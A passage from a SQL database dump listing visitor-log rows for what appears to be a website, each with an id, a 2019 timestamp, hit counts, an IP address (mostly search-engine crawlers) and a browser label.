17,1561710828,1,1,0,0,'157.55.39.57','other'),(431618,1561710934,3,3,0,0,'66.249.66.218','chrome'),(431619,1561711544,2,2,0,0,'40.77.167.70','other'),(431620,1561711799,1,1,0,0,'66.249.66.220','chrome'),(431621,1561712056,1,1,0,0,'95.163.255.154','other'),(431622,1561712190,1,1,0,0,'40.77.167.43','other'),(431623,1561712248,1,1,0,0,'95.163.255.185','other'),(431624,1561712278,1,1,0,0,'66.249.66.128','chrome'),(431625,1561712330,1,1,0,0,'66.249.66.222','chrome'),(431626,1561712585,1,1,0,0,'95.163.255.179','other'),(431627,1561712845,3,3,0,0,'66.249.66.220','chrome'),(431628,1561713320,1,1,0,0,'5.45.207.79','other'),(431629,1561713651,1,1,0,0,'95.163.255.98','other'),(431630,1561714086,2,2,0,0,'66.249.66.222','chrome'),(431631,1561714267,1,1,0,0,'8.29.198.27','other'),(431632,1561714298,1,1,0,0,'8.29.198.26','other'),(431633,1561714752,1,1,0,0,'66.249.66.218','chrome'),(431634,1561714826,1,1,0,0,'66.249.66.220','chrome'),(431635,1561715654,1,1,0,0,'66.249.66.130','chrome'),(431636,1561716056,1,1,0,0,'66.249.66.218','chrome'),(431637,1561716152,1,1,0,0,'66.102.9.28','chrome'),(431638,1561716747,3,3,0,0,'66.249.66.220','chrome'),(431639,1561717420,1,1,0,0,'66.249.66.130','chrome'),(431640,1561717422,1,1,0,0,'95.108.213.4','other'),(431641,1561717425,1,1,0,0,'109.74.154.72','chrome'),(431642,1561717471,1,1,0,0,'37.9.113.148','other'),(431643,1561717753,1,1,0,0,'66.249.66.218','chrome'),(431644,1561717799,1,1,0,0,'66.249.66.128','chrome'),(431645,1561717896,1,1,0,0,'40.77.167.114','other'),(431646,1561718454,1,1,0,0,'66.249.66.222','chrome'),(431647,1561719591,1,1,0,0,'66.249.66.220','chrome'),(431648,1561719618,2,2,0,0,'207.46.13.26','other'),(431649,1561719647,1,1,0,0,'157.55.39.57','other'),(431650,1561719657,2,2,0,0,'40.77.167.43','other'),(431651,1561719754,1,1,0,0,'13.66.139.0','other'),(431652,1561720208,1,1,0,0,'91.196.178.41','chrome'),(431653,1561720325,4,4,0,0,'66.249.66.132','chrome'),(431654,1561720945,1,1,0,0,'157.55.39.57','other'),(431655,1561720952,1,1,0,0,'207.46.13.26','other'),(431656,1561720953,2,2,0,0,'178.154.244.11','other'),(431657,1561721614,2,2,0,0,'66.249.66.218','chrome'),(431658,1561721846,1,1,0,0,'66.249.66.222','chrome'),(431659,1561722079,1,1,0,0,'5.45.207.79','other'),(431660,1561722240,1,1,0,0,'207.46.13.247','other'),(431661,1561722844,2,2,0,0,'66.249.66.218','chrome'),(431662,1561724040,1,1,0,0,'5.45.207.79','other'),(431663,1561724042,2,2,0,0,'66.249.66.218','chrome'),(431664,1561724122,1,1,0,0,'66.249.66.130','chrome'),(431665,1561724162,2,2,0,0,'66.249.66.222','chrome'),(431666,1561724306,1,1,0,0,'157.55.39.57','other'),(431667,1561724788,1,1,0,0,'66.249.66.220','chrome'),(431668,1561725138,1,1,0,0,'8.29.198.25','other'),(431669,1561725168,1,1,0,0,'8.29.198.26','other'),(431670,1561725261,1,1,0,0,'207.46.13.26','other'),(431671,1561725816,1,1,0,0,'66.249.66.130','chrome'),(431672,1561725907,1,1,0,0,'66.249.66.222','chrome'),(431673,1561725924,1,1,0,0,'66.249.66.218','chrome'),(431674,1561725949,1,1,0,0,'207.46.13.247','other'),(431675,1561726020,1,1,0,0,'66.249.66.220','chrome'),(431676,1561726313,2,2,0,0,'207.46.13.26','other'),(431677,1561726574,1,1,0,0,'92.112.248.103','chrome'),(431678,1561726991,1,1,0,0,'95.163.255.178','other'),(431679,1561727174,2,2,0,0,'66.249.66.220','chrome'),(431680,1561727688,1,1,0,0,'66.249.66.128','chrome'),(431681,1561727762,1,1,0,0,'66.249.66.222','chrome'),(431682,1561728279,1,1,0,0,'193.106.30.98','chrome'),(431683,1561728920,2,2,0,0,'66.249.66.128','chrome'),(431684,1561728934,4,4,0,0,'66.249.66.220','chrome'),(431685,1561729025,2,2,0,0,'66.249.66.218','chrome'),(431686,1561729342,1,1,0,0,'157.55.39.74','other'),(431687,1561729436,2,2,0,0,'66.249.66.132','chrome'),(431688,1561729996,1,1,0,0,'66.249.66.222','chrome'),(431689,1561731119,1,1,0,0,'157.55.39.247','other'),(431690,1561731819,1,1,0,0,'178.154.244.11','other'),(431691,1561731915,1,1,0,0,'95.163.255.171','other'),(431692,1561733030,1,1,0,0,'66.249.66.218','chrome'),(431693,1561733084,2,2,0,0,'207.46.13.247','other'),(431694,1561733454,1,1,0,0,'95.163.255.92','other'),(431695,1561734454,1,1,0,0,'207.46.13.247','other'),(431696,1561734774,1,1,0,0,'66.249.66.220','chrome'),(431697,1561735903,89,89,0,0,'78.46.176.21','other'),(431698,1561736025,1,1,0,0,'8.29.198.26','other'),(431699,1561736104,1,1,0,0,'8.29.198.27','other'),(431700,1561736110,237,237,0,0,'178.63.13.154','other'),(431701,1561737012,36,36,0,0,'178.63.13.154','other'),(431702,1561737390,1,1,0,0,'157.55.39.247','other'),(431703,1561738097,1,1,0,0,'95.163.255.177','other'),(431704,1561738271,114,114,0,0,'5.189.159.208','other'),(431705,1561738629,1,1,0,0,'5.45.207.19','other'),(431706,1561739120,1,1,0,0,'95.163.255.95','other'),(431707,1561739540,1,1,0,0,'207.46.13.247','other'),(431708,1561740652,1,1,0,0,'207.46.13.26','other'),(431709,1561741961,2,2,0,0,'5.45.207.19','other'),(431710,1561741963,1,1,0,0,'178.154.244.11','other'),(431711,1561742121,1,1,0,0,'157.55.39.109','other'),(431712,1561742309,1,1,0,0,'207.46.13.26','other'),(431713,1561742344,1,1,0,0,'66.249.66.222','chrome'),(431714,1561742495,1,1,0,0,'66.249.66.132','chrome'),(431715,1561742631,3,3,0,0,'66.249.66.218','chrome'),(431716,1561742633,2,2,0,0,'66.249.66.130','chrome'),(431717,1561743190,1,1,0,0,'207.46.13.175','other'),(431718,1561743391,1,1,0,0,'66.249.66.222','chrome'),(431719,1561743720,1,1,0,0,'66.249.66.218','chrome'),(431720,1561743721,1,1,0,0,'66.249.66.220','chrome'),(431721,1561744691,1,1,0,0,'207.46.13.247','other'),(431722,1561745824,1,1,0,0,'178.154.244.11','other'),(431723,1561746174,1,1,0,0,'5.45.207.79','other'),(431724,1561746390,3,3,0,0,'207.46.13.247','other'),(431725,1561746499,1,1,0,0,'95.108.213.4','other'),(431726,1561746895,1,1,0,0,'207.46.13.4','other'),(431727,1561746900,2,2,0,0,'8.29.198.27','other'),(431728,1561747971,1,1,0,0,'207.46.13.175','other'),(431729,1561748877,3,3,0,0,'66.249.66.218','chrome'),(431730,1561749141,1,1,0,0,'5.45.207.19','other'),(431731,1561749365,2,2,0,0,'66.249.66.128','chrome'),(431732,1561749438,1,1,0,0,'207.46.13.247','other'),(431733,1561749678,5,5,0,0,'66.249.66.222','chrome'),(431734,1561749784,2,2,0,0,'66.249.66.218','chrome'),(431735,1561749804,2,2,0,0,'207.46.13.4','other'),(431736,1561750123,3,3,0,0,'66.249.66.220','chrome'),(431737,1561750369,1,1,0,0,'66.249.66.128','chrome'),(431738,1561750477,1,1,0,0,'157.55.39.55','other'),(431739,1561750736,3,3,0,0,'66.249.66.222','chrome'),(431740,1561750807,2,2,0,0,'66.249.66.218','chrome'),(431741,1561751591,3,3,0,0,'157.55.39.55','other'),(431742,1561751715,2,2,0,0,'66.249.66.222','chrome'),(431743,1561751743,2,2,0,0,'66.249.66.220','chrome'),(431744,1561752116,1,1,0,0,'46.211.74.180','chrome'),(431745,1561752295,1,1,0,0,'207.46.13.175','other'),(431746,1561752436,1,1,0,0,'95.163.255.99','other'),(431747,1561753163,1,1,0,0,'207.46.13.4','other'),(431748,1561753556,2,2,0,0,'178.154.244.11','other'),(431749,1561753585,1,1,0,0,'40.77.167.153','other'),(431750,1561754009,1,1,0,0,'95.163.255.163','other'),(431751,1561754922,3,3,0,0,'66.249.66.220','chrome'),(431752,1561754990,1,1,0,0,'66.249.66.128','chrome'),(431753,1561755535,2,2,0,0,'207.46.13.228','other'),(431754,1561755659,1,1,0,0,'207.46.13.4','other'),(431755,1561755859,1,1,0,0,'95.163.255.93','other'),(431756,1561755900,1,1,0,0,'207.46.13.175','other'),(431757,1561756759,1,1,0,0,'207.46.13.4','other'),(431758,1561757383,1,1,0,0,'5.45.207.19','other'),(431759,1561757412,1,1,0,0,'66.249.66.218','chrome'),(431760,1561757627,1,1,0,0,'66.249.66.130','chrome'),(431761,1561757782,1,1,0,0,'8.29.198.26','other'),(431762,1561757853,3,3,0,0,'66.249.66.220','chrome'),(431763,1561757898,1,1,0,0,'8.29.198.25','other'),(431764,1561758401,1,1,0,0,'207.46.13.228','other'),(431765,1561758519,2,2,0,0,'66.249.66.218','chrome'),(431766,1561758934,1,1,0,0,'207.46.13.4','other'),(431767,1561759338,1,1,0,0,'66.249.66.222','chrome'),(431768,1561759628,1,1,0,0,'66.249.66.220','chrome'),(431769,1561759652,4,4,0,0,'66.249.66.130','chrome'),(431770,1561759654,1,1,0,0,'66.249.66.218','chrome'),(431771,1561760563,5,5,0,0,'66.249.66.220','chrome'),(431772,1561761107,2,2,0,0,'207.46.13.228','other'),(431773,1561761265,2,2,0,0,'66.249.66.128','chrome'),(431774,1561761360,1,1,0,0,'5.45.207.19','other'),(431775,1561761380,2,2,0,0,'66.249.66.130','chrome'),(431776,1561761434,2,2,0,0,'5.45.207.79','other'),(431777,1561761435,3,3,0,0,'66.249.66.218','chrome'),(431778,1561761485,1,1,0,0,'66.249.66.220','chrome'),(431779,1561761780,1,1,0,0,'66.249.66.132','chrome'),(431780,1561762482,4,4,0,0,'66.249.66.222','chrome'),(431781,1561762493,2,2,0,0,'207.46.13.228','other'),(431782,1561762543,16,16,0,0,'66.249.66.218','chrome'),(431783,1561762852,1,1,0,0,'66.249.66.128','chrome'),(431784,1561762873,1,1,0,0,'66.249.66.132','chrome'),(431785,1561762877,5,5,0,0,'66.249.66.220','chrome'),(431786,1561763405,1,1,0,0,'66.249.66.222','chrome'),(431787,1561763900,1,1,0,0,'66.249.66.130','chrome'),(431788,1561764087,1,1,0,0,'66.249.66.220','chrome'),(431789,1561764151,2,2,0,0,'66.249.66.218','chrome'),(431790,1561764879,4,4,0,0,'167.86.70.217','other'),(431791,1561765177,4,4,0,0,'207.244.157.10','other'),(431792,1561765284,1,1,0,0,'178.154.244.11','other'),(431793,1561765734,2,2,0,0,'66.249.66.222','chrome'),(431794,1561765757,5,5,0,0,'66.249.66.220','chrome'),(431795,1561766379,1,1,0,0,'66.249.66.218','chrome'),(431796,1561766489,2,2,0,0,'66.249.66.128','chrome'),(431797,1561766911,1,1,0,0,'66.249.66.222','chrome'),(431798,1561766941,1,1,0,0,'66.249.66.220','chrome'),(431799,1561767430,1,1,0,0,'66.249.66.130','chrome'),(431800,1561767846,1,1,0,0,'157.55.39.203','other'),(431801,1561768031,2,2,0,0,'66.249.66.220','chrome'),(431802,1561768301,2,2,0,0,'66.249.66.218','chrome'),(431803,1561768458,1,1,0,0,'207.46.13.4','other'),(431804,1561768656,2,2,0,0,'8.29.198.26','other'),(431805,1561769331,3,3,0,0,'66.249.66.218','chrome'),(431806,1561770292,1,1,0,0,'95.163.255.172','other'),(431807,1561770772,2,2,0,0,'66.249.66.222','chrome'),(431808,1561771757,1,1,0,0,'178.154.244.11','other'),(431809,1561771791,1,1,0,0,'66.249.66.130','chrome'),(431810,1561771877,1,1,0,0,'66.249.66.132','chrome'),(431811,1561772211,2,2,0,0,'207.46.13.4','other'),(431812,1561772499,2,2,0,0,'66.249.66.222','chrome'),(431813,1561773520,1,1,0,0,'66.249.66.222','chrome'),(431814,1561773683,1,1,0,0,'66.249.66.218','chrome'),(431815,1561773968,1,1,0,0,'66.249.66.132','chrome'),(431816,1561774754,1,1,0,0,'66.249.66.220','chrome'),(431817,1561774846,1,1,0,0,'178.154.244.11','other'),(431818,1561775073,1,1,0,0,'5.45.207.19','other'),(431819,1561776137,2,2,0,0,'66.249.66.132','chrome'),(431820,1561776225,1,1,0,0,'66.249.66.130','chrome'),(431821,1561776665,1,1,0,0,'66.249.66.222','chrome'),(431822,1561776890,1,1,0,0,'157.55.39.206','other'),(431823,1561777463,1,1,0,0,'141.8.142.103','other'),(431824,1561777517,1,1,0,0,'193.106.30.98','chrome'),(431825,1561777764,1,1,0,0,'66.249.66.220','chrome'),(431826,1561778595,1,1,0,0,'157.55.39.232','other'),(431827,1561778726,1,1,0,0,'54.186.147.248','other'),(431828,1561779525,1,1,0,0,'8.29.198.27','other'),(431829,1561779630,1,1,0,0,'66.249.66.220','chrome'),(431830,1561779647,1,1,0,0,'8.29.198.25','other'),(431831,1561779999,1,1,0,0,'5.45.207.79','other'),(431832,1561780081,1,1,0,0,'66.249.66.222','chrome'),(431833,1561780242,1,1,0,0,'91.209.11.236','other'),(431834,1561780508,1,1,0,0,'95.163.255.97','other'),(431835,1561781210,4,4,0,0,'66.249.66.218','chrome'),(431836,1561781531,1,1,0,0,'95.163.255.155','other'),(431837,1561781658,1,1,0,0,'207.46.13.1','other'),(431838,1561782362,1,1,0,0,'176.9.9.94','other'),(431839,1561782517,1,1,0,0,'178.154.171.27','other'),(431840,1561782853,3,3,0,0,'66.249.66.218','chrome'),(431841,1561783073,1,1,0,0,'66.249.66.220','chrome'),(431842,1561783369,1,1,0,0,'66.249.66.132','chrome'),(431843,1561783799,2,2,0,0,'66.249.66.128','chrome'),(431844,1561784772,1,1,0,0,'207.46.13.1','other'),(431845,1561785184,1,1,0,0,'5.45.207.79','other'),(431846,1561785212,1,1,0,0,'178.154.244.11','other'),(431847,1561785233,1,1,0,0,'66.249.66.218','chrome'),(431848,1561785309,1,1,0,0,'66.249.66.128','chrome'),(431849,1561785340,1,1,0,0,'66.249.66.220','chrome'),(431850,1561786204,1,1,0,0,'178.154.244.11','other'),(431851,1561786425,1,1,0,0,'66.249.66.220','chrome'),(431852,1561786828,2,2,0,0,'66.249.66.222','chrome'),(431853,1561786850,1,1,0,0,'157.55.39.232','other'),(431854,1561786857,2,2,0,0,'66.249.66.218','chrome'),(431855,1561786966,1,1,0,0,'66.249.66.130','chrome'),(431856,1561787007,1,1,0,0,'209.17.97.82','other'),(431857,1561787293,1,1,0,0,'178.154.244.11','other'),(431858,1561787981,4,4,0,0,'66.249.66.218','chrome'),(431859,1561788034,1,1,0,0,'5.45.207.19','other'),(431860,1561788201,1,1,0,0,'157.55.39.189','other'),(431861,1561788305,3,3,0,0,'66.249.66.220','chrome'),(431862,1561788890,2,2,0,0,'66.249.66.218','chrome'),(431863,1561790195,1,1,0,0,'66.249.66.132','chrome'),(431864,1561790249,1,1,0,0,'207.46.13.1','other'),(431865,1561790385,1,1,0,0,'8.29.198.27','other'),(431866,1561790508,1,1,0,0,'8.29.198.26','other'),(431867,1561790547,2,2,0,0,'66.249.66.220','chrome'),(431868,1561790628,1,1,0,0,'157.55.39.232','other'),(431869,1561790843,1,1,0,0,'95.163.255.184','other'),(431870,1561791003,1,1,0,0,'66.249.66.218','chrome'),(431871,1561791966,3,3,0,0,'66.249.66.220','chrome'),(431872,1561792245,1,1,0,0,'66.249.66.222','chrome'),(431873,1561793045,1,1,0,0,'66.249.66.220','chrome'),(431874,1561793840,1,1,0,0,'178.154.244.11','other'),(431875,1561793877,1,1,0,0,'178.162.199.5','chrome'),(431876,1561793932,1,1,0,0,'207.46.13.1','other'),(431877,1561794422,3,3,0,0,'66.249.66.220','chrome'),(431878,1561794674,3,3,0,0,'66.249.66.132','chrome'),(431879,1561794965,2,2,0,0,'66.249.66.222','chrome'),(431880,1561795259,1,1,0,0,'95.163.255.197','other'),(431881,1561795343,2,2,0,0,'66.249.66.218','chrome'),(431882,1561795446,1,1,0,0,'66.249.66.220','chrome'),(431883,1561795452,1,1,0,0,'66.249.66.130','chrome'),(431884,1561796607,10,10,0,0,'66.249.66.220','chrome'),(431885,1561796656,12,12,0,0,'66.249.66.218','chrome'),(431886,1561796709,2,2,0,0,'66.249.66.128','chrome'),(431887,1561796833,3,3,0,0,'66.249.66.132','chrome'),(431888,1561796841,2,2,0,0,'66.249.66.130','chrome'),(431889,1561796872,3,3,0,0,'66.249.66.222','chrome'),(431890,1561797662,1,1,0,0,'157.55.39.189','other'),(431891,1561799293,1,1,0,0,'91.209.11.236','other'),(431892,1561799317,1,1,0,0,'157.55.39.189','other'),(431893,1561799456,1,1,0,0,'66.249.66.130','chrome'),(431894,1561799518,2,2,0,0,'40.77.167.147','other'),(431895,1561799538,4,4,0,0,'66.249.66.220','chrome'),(431896,1561799658,2,2,0,0,'66.249.66.222','chrome'),(431897,1561799673,1,1,0,0,'66.249.66.218','chrome'),(431898,1561800279,1,1,0,0,'178.154.244.11','other'),(431899,1561800389,1,1,0,0,'157.55.39.217','other'),(431900,1561800656,1,1,0,0,'87.250.224.65','other'),(431901,1561800819,1,1,0,0,'66.249.66.220','chrome'),(431902,1561800903,1,1,0,0,'95.163.255.188','other'),(431903,1561800961,2,2,0,0,'51.68.152.26','chrome'),(431904,1561801237,1,1,0,0,'8.29.198.25','other'),(431905,1561801259,1,1,0,0,'66.249.66.222','chrome'),(431906,1561801356,1,1,0,0,'207.46.13.1','other'),(431907,1561801369,1,1,0,0,'8.29.198.26','other'),(431908,1561801878,2,2,0,0,'66.249.66.220','chrome'),(431909,1561801881,1,1,0,0,'66.249.66.130','chrome'),(431910,1561801923,1,1,0,0,'157.55.39.126','other'),(431911,1561802216,1,1,0,0,'95.163.255.168','other'),(431912,1561802222,1,1,0,0,'66.249.66.222','chrome'),(431913,1561802322,1,1,0,0,'66.249.66.218','chrome'),(431914,1561802614,1,1,0,0,'95.163.255.93','other'),(431915,1561802676,1,1,0,0,'109.74.154.72','chrome'),(431916,1561803605,2,2,0,0,'66.249.66.222','chrome'),(431917,1561803747,2,2,0,0,'66.249.66.130','chrome'),(431918,1561804018,2,2,0,0,'66.249.66.218','chrome'),(431919,1561804364,1,1,0,0,'46.42.160.148','msie'),(431920,1561804449,1,1,0,0,'66.249.66.81','chrome'),(431921,1561804482,1,1,0,0,'66.249.66.134','chrome'),(431922,1561804483,1,1,0,0,'66.249.66.128','chrome'),(431923,1561804501,1,1,0,0,'66.249.66.220','chrome'),(431924,1561804623,1,1,0,0,'193.106.30.98','chrome'),(431925,1561804715,1,1,0,0,'66.249.66.222','chrome'),(431926,1561805203,1,1,0,0,'13.66.139.0','other'),(431927,1561805553,1,1,0,0,'207.46.13.42','other'),(431928,1561805733,1,1,0,0,'40.77.167.128','other'),(431929,1561805853,1,1,0,0,'66.249.66.136','chrome'),(431930,1561806041,1,1,0,0,'66.249.66.134','chrome'),(431931,1561806053,1,1,0,0,'95.163.255.185','other'),(431932,1561806437,1,1,0,0,'157.55.39.189','other'),(431933,1561806785,1,1,0,0,'66.249.66.222','chrome'),(431934,1561807068,1,1,0,0,'66.249.66.64','chrome'),(431935,1561807801,1,1,0,0,'157.55.39.189','other'),(431936,1561808081,1,1,0,0,'40.77.167.147','other'),(431937,1561808646,2,2,0,0,'66.249.66.82','chrome'),(431938,1561808975,1,1,0,0,'157.55.39.189','other'),(431939,1561809032,1,1,0,0,'141.8.132.16','other'),(431940,1561809217,1,1,0,0,'95.163.255.168','other'),(431941,1561809227,1,1,0,0,'66.249.66.218','chrome'),(431942,1561809265,1,1,0,0,'141.8.142.144','other'),(431943,1561809335,1,1,0,0,'40.77.167.128','other'),(431944,1561809358,1,1,0,0,'66.249.66.81','chrome'),(431945,1561809434,7,7,0,0,'5.9.104.30','other'),(431946,1561809608,1,1,0,0,'95.163.255.191','other'),(431947,1561809845,1,1,0,0,'66.249.66.222','chrome'),(431948,1561810656,1,1,0,0,'13.66.139.0','other'),(431949,1561810725,1,1,0,0,'40.77.167.147','other'),(431950,1561810802,1,1,0,0,'66.249.66.218','chrome'),(431951,1561810806,1,1,0,0,'87.250.224.81','other'),(431952,1561811472,3,3,0,0,'66.249.66.82','chrome'),(431953,1561811533,1,1,0,0,'66.249.66.220','chrome'),(431954,1561811700,1,1,0,0,'66.249.66.138','chrome'),(431955,1561811908,1,1,0,0,'66.249.66.66','chrome'),(431956,1561811980,1,1,0,0,'66.249.66.68','chrome'),(431957,1561812107,1,1,0,0,'8.29.198.27','other'),(431958,1561812217,1,1,0,0,'8.29.198.25','other'),(431959,1561812611,1,1,0,0,'207.46.13.42','other'),(431960,1561812659,1,1,0,0,'66.249.66.134','chrome'),(431961,1561812882,1,1,0,0,'141.8.142.108','other'),(431962,1561813163,2,2,0,0,'66.249.66.66','chrome'),(431963,1561813976,1,1,0,0,'66.249.66.68','chrome'),(431964,1561814069,3,3,0,0,'66.249.66.220','chrome'),(431965,1561814692,1,1,0,0,'40.77.167.128','other'),(431966,1561815049,1,1,0,0,'66.249.66.218','chrome'),(431967,1561815255,1,1,0,0,'40.77.167.129','other'),(431968,1561815557,1,1,0,0,'66.249.66.83','chrome'),(431969,1561815604,1,1,0,0,'207.46.13.173','other'),(431970,1561815758,2,2,0,0,'66.249.66.81','chrome'),(431971,1561815821,1,1,0,0,'87.250.224.81','other'),(431972,1561815957,1,1,0,0,'141.8.142.144','other'),(431973,1561816018,1,1,0,0,'66.249.66.220','chrome'),(431974,1561816283,1,1,0,0,'40.77.167.8','other'),(431975,1561816334,1,1,0,0,'46.211.74.194','chrome'),(431976,1561816469,1,1,0,0,'207.46.13.42','other'),(431977,1561816650,1,1,0,0,'95.163.255.152','other'),(431978,1561816948,2,2,0,0,'66.249.66.130','chrome'),(431979,1561816956,3,3,0,0,'66.249.66.218','chrome'),(431980,1561817174,1,1,0,0,'66.249.66.222','chrome'),(431981,1561817324,1,1,0,0,'91.209.11.236','other'),(431982,1561817364,1,1,0,0,'66.249.66.220','chrome'),(431983,1561817880,1,1,0,0,'95.163.255.191','other'),(431984,1561818300,1,1,0,0,'207.46.13.174','other'),(431985,1561818466,1,1,0,0,'207.46.13.42','other'),(431986,1561818509,1,1,0,0,'66.249.66.222','chrome'),(431987,1561818727,2,2,0,0,'66.249.66.130','chrome'),(431988,1561818910,1,1,0,0,'178.154.244.11','other'),(431989,1561818914,1,1,0,0,'95.108.181.83','other'),(431990,1561819289,1,1,0,0,'66.249.66.218','chrome'),(431991,1561819367,1,1,0,0,'66.249.66.220','chrome'),(431992,1561819705,1,1,0,0,'37.73.142.182','chrome'),(431993,1561819716,1,1,0,0,'178.154.171.24','other'),(431994,1561819864,1,1,0,0,'40.77.167.128','other'),(431995,1561820241,2,2,0,0,'40.77.167.165','other'),(431996,1561820525,1,1,0,0,'66.249.66.222','chrome'),(431997,1561820625,1,1,0,0,'66.249.66.130','chrome'),(431998,1561820702,2,2,0,0,'91.209.11.236','other'),(431999,1561820735,3,3,0,0,'66.249.66.220','chrome'),(432000,1561821003,2,2,0,0,'66.249.66.132','chrome'),(432001,1561821358,1,1,0,0,'178.154.171.24','other'),(432002,1561821385,1,1,0,0,'178.154.171.27','other'),(432003,1561822022,2,2,0,0,'66.249.66.128','chrome'),(432004,1561822068,1,1,0,0,'66.249.66.218','chrome'),(432005,1561822305,1,1,0,0,'66.249.66.220','chrome'),(432006,1561822329,1,1,0,0,'66.249.66.222','chrome'),(432007,1561822533,1,1,0,0,'40.77.167.68','other'),(432008,1561822830,2,2,0,0,'157.55.39.138','other'),(432009,1561822986,2,2,0,0,'8.29.198.26','other'),(432010,1561823476,1,1,0,0,'157.55.39.167','other'),(432011,1561823553,1,1,0,0,'40.77.167.43','other'),(432012,1561823570,1,1,0,0,'66.249.66.130','chrome'),(432013,1561823697,2,2,0,0,'66.249.66.220','chrome'),(432014,1561824018,1,1,0,0,'66.249.66.132','chrome'),(432015,1561824056,2,2,0,0,'66.249.66.222','chrome'),(432016,1561824967,1,1,0,0,'95.163.255.99','other'),(432017,1561825396,1,1,0,0,'66.249.66.222','chrome'),(432018,1561825471,1,1,0,0,'66.249.66.130','chrome'),(432019,1561825577,1,1,0,0,'157.55.39.167','other'),(432020,1561826134,1,1,0,0,'66.249.66.128','chrome'),(432021,1561826430,1,1,0,0,'40.77.167.68','other'),(432022,1561826847,1,1,0,0,'178.154.171.27','other'),(432023,1561827137,1,1,0,0,'95.108.181.54','other'),(432024,1561827678,1,1,0,0,'178.154.244.49','other'),(432025,1561827805,1,1,0,0,'66.249.66.128','chrome'),(432026,1561827868,2,2,0,0,'66.249.66.218','chrome'),(432027,1561828000,3,3,0,0,'66.249.66.222','chrome'),(432028,1561828685,1,1,0,0,'95.163.255.177','other'),(432029,1561828698,1,1,0,0,'213.180.203.9','other'),(432030,1561829678,2,2,0,0,'40.77.167.19','other'),(432031,1561829992,1,1,0,0,'66.249.66.220','chrome'),(432032,1561830068,1,1,0,0,'37.9.113.103','other'),(432033,1561830234,1,1,0,0,'157.55.39.167','other'),(432034,1561831075,1,1,0,0,'40.77.167.19','other'),(432035,1561831362,1,1,0,0,'40.77.167.43','other'),(432036,1561831604,1,1,0,0,'40.77.167.68','other'),(432037,1561831670,1,1,0,0,'66.249.66.220','chrome'),(432038,1561831708,1,1,0,0,'193.106.30.98','chrome'),(432039,1561831739,1,1,0,0,'95.163.255.184','other'),(432040,1561831929,2,2,0,0,'66.249.66.222','chrome'),(432041,1561833142,1,1,0,0,'66.249.66.130','chrome'),(432042,1561833285,1,1,0,0,'141.8.142.103','other'),(432043,1561833312,1,1,0,0,'87.250.224.65','other'),(432044,1561833358,1,1,0,0,'37.9.113.20','other'),(432045,1561833359,1,1,0,0,'40.77.167.19','other'),(432046,1561833568,1,1,0,0,'157.55.39.167','other'),(432047,1561833785,1,1,0,0,'40.77.167.43','other'),(432048,1561833858,1,1,0,0,'8.29.198.27','other'),(432049,1561833878,1,1,0,0,'207.46.13.11','other'),(432050,1561833940,1,1,0,0,'8.29.198.25','other'),(432051,1561834407,1,1,0,0,'95.163.255.180','other'),(432052,1561834626,1,1,0,0,'40.77.167.68','other'),(432053,1561834826,1,1,0,0,'207.46.13.11','other'),(432054,1561835375,2,2,0,0,'66.249.66.218','chrome'),(432055,1561835395,2,2,0,0,'66.249.66.220','chrome'),(432056,1561835588,2,2,0,0,'66.249.66.222','chrome'),(432057,1561835665,1,1,0,0,'66.249.66.128','chrome'),(432058,1561836317,1,1,0,0,'66.249.66.218','chrome'),(432059,1561836347,1,1,0,0,'207.46.13.11','other'),(432060,1561836952,3,3,0,0,'66.249.66.222','chrome'),(432061,1561836973,1,1,0,0,'40.77.167.68','other'),(432062,1561837042,1,1,0,0,'91.209.11.236','other'),(432063,1561837485,1,1,0,0,'66.249.66.128','chrome'),(432064,1561838395,1,1,0,0,'40.77.167.43','other'),(432065,1561838675,4,4,0,0,'66.249.66.218','chrome'),(432066,1561838697,1,1,0,0,'66.249.66.220','chrome'),(432067,1561838746,1,1,0,0,'66.249.66.128','chrome'),(432068,1561838823,1,1,0,0,'66.249.66.222','chrome'),(432069,1561839796,1,1,0,0,'157.55.39.193','other'),(432070,1561840011,1,1,0,0,'66.249.66.128','chrome'),(432071,1561840019,2,2,0,0,'66.249.66.220','chrome'),(432072,1561840085,4,4,0,0,'66.249.66.218','chrome'),(432073,1561840189,1,1,0,0,'66.249.66.222','chrome'),(432074,1561840307,1,1,0,0,'66.249.66.132','chrome'),(432075,1561840539,1,1,0,0,'178.154.244.11','other'),(432076,1561841524,1,1,0,0,'66.249.66.128','chrome'),(432077,1561841547,2,2,0,0,'66.249.66.220','chrome'),(432078,1561841603,2,2,0,0,'207.46.13.11','other'),(432079,1561841610,1,1,0,0,'66.249.66.218','chrome'),(432080,1561841917,2,2,0,0,'66.249.66.222','chrome'),(432081,1561842271,2,2,0,0,'207.46.13.23','other'),(432082,1561842765,5,5,0,0,'66.249.66.220','chrome'),(432083,1561842847,3,3,0,0,'66.249.66.218','chrome'),(432084,1561843026,1,1,0,0,'66.249.66.132','chrome'),(432085,1561843098,1,1,0,0,'66.249.66.128','chrome'),(432086,1561844734,1,1,0,0,'8.29.198.26','other'),(432087,1561844806,1,1,0,0,'8.29.198.25','other'),(432088,1561844993,3,3,0,0,'66.249.66.130','chrome'),(432089,1561844999,3,3,0,0,'66.249.66.222','chrome'),(432090,1561845012,3,3,0,0,'66.249.66.128','chrome'),(432091,1561845064,2,2,0,0,'66.249.66.220','chrome'),(432092,1561845078,4,4,0,0,'66.249.66.218','chrome'),(432093,1561845581,1,1,0,0,'95.108.181.54','other'),(432094,1561845686,1,1,0,0,'40.77.167.103','other'),(432095,1561845822,1,1,0,0,'207.46.13.11','other'),(432096,1561846461,1,1,0,0,'141.8.142.38','other'),(432097,1561846745,1,1,0,0,'40.77.167.103','other'),(432098,1561848949,1,1,0,0,'95.163.255.153','other'),(432099,1561849465,1,1,0,0,'66.249.66.218','chrome'),(432100,1561850468,1,1,0,0,'87.250.224.81','other'),(432101,1561850994,2,2,0,0,'207.46.13.11','other'),(432102,1561851300,1,1,0,0,'40.77.167.103','other'),(432103,1561851665,1,1,0,0,'66.249.66.222','chrome'),(432104,1561851765,3,3,0,0,'66.249.66.220','chrome'),(432105,1561852997,1,1,0,0,'207.46.13.6','other'),(432106,1561853109,1,1,0,0,'95.163.255.162','other'),(432107,1561854074,1,1,0,0,'66.249.66.130','chrome'),(432108,1561854179,2,2,0,0,'66.249.66.218','chrome'),(432109,1561854312,2,2,0,0,'66.249.66.220','chrome'),(432110,1561854548,1,1,0,0,'66.249.66.222','chrome'),(432111,1561854846,1,1,0,0,'91.209.11.236','other'),(432112,1561855039,1,1,0,0,'207.46.13.6','other'),(432113,1561855595,2,2,0,0,'8.29.198.25','other'),(432114,1561856177,1,1,0,0,'40.77.167.103','other'),(432115,1561856331,2,2,0,0,'5.45.207.19','other'),(432116,1561856389,1,1,0,0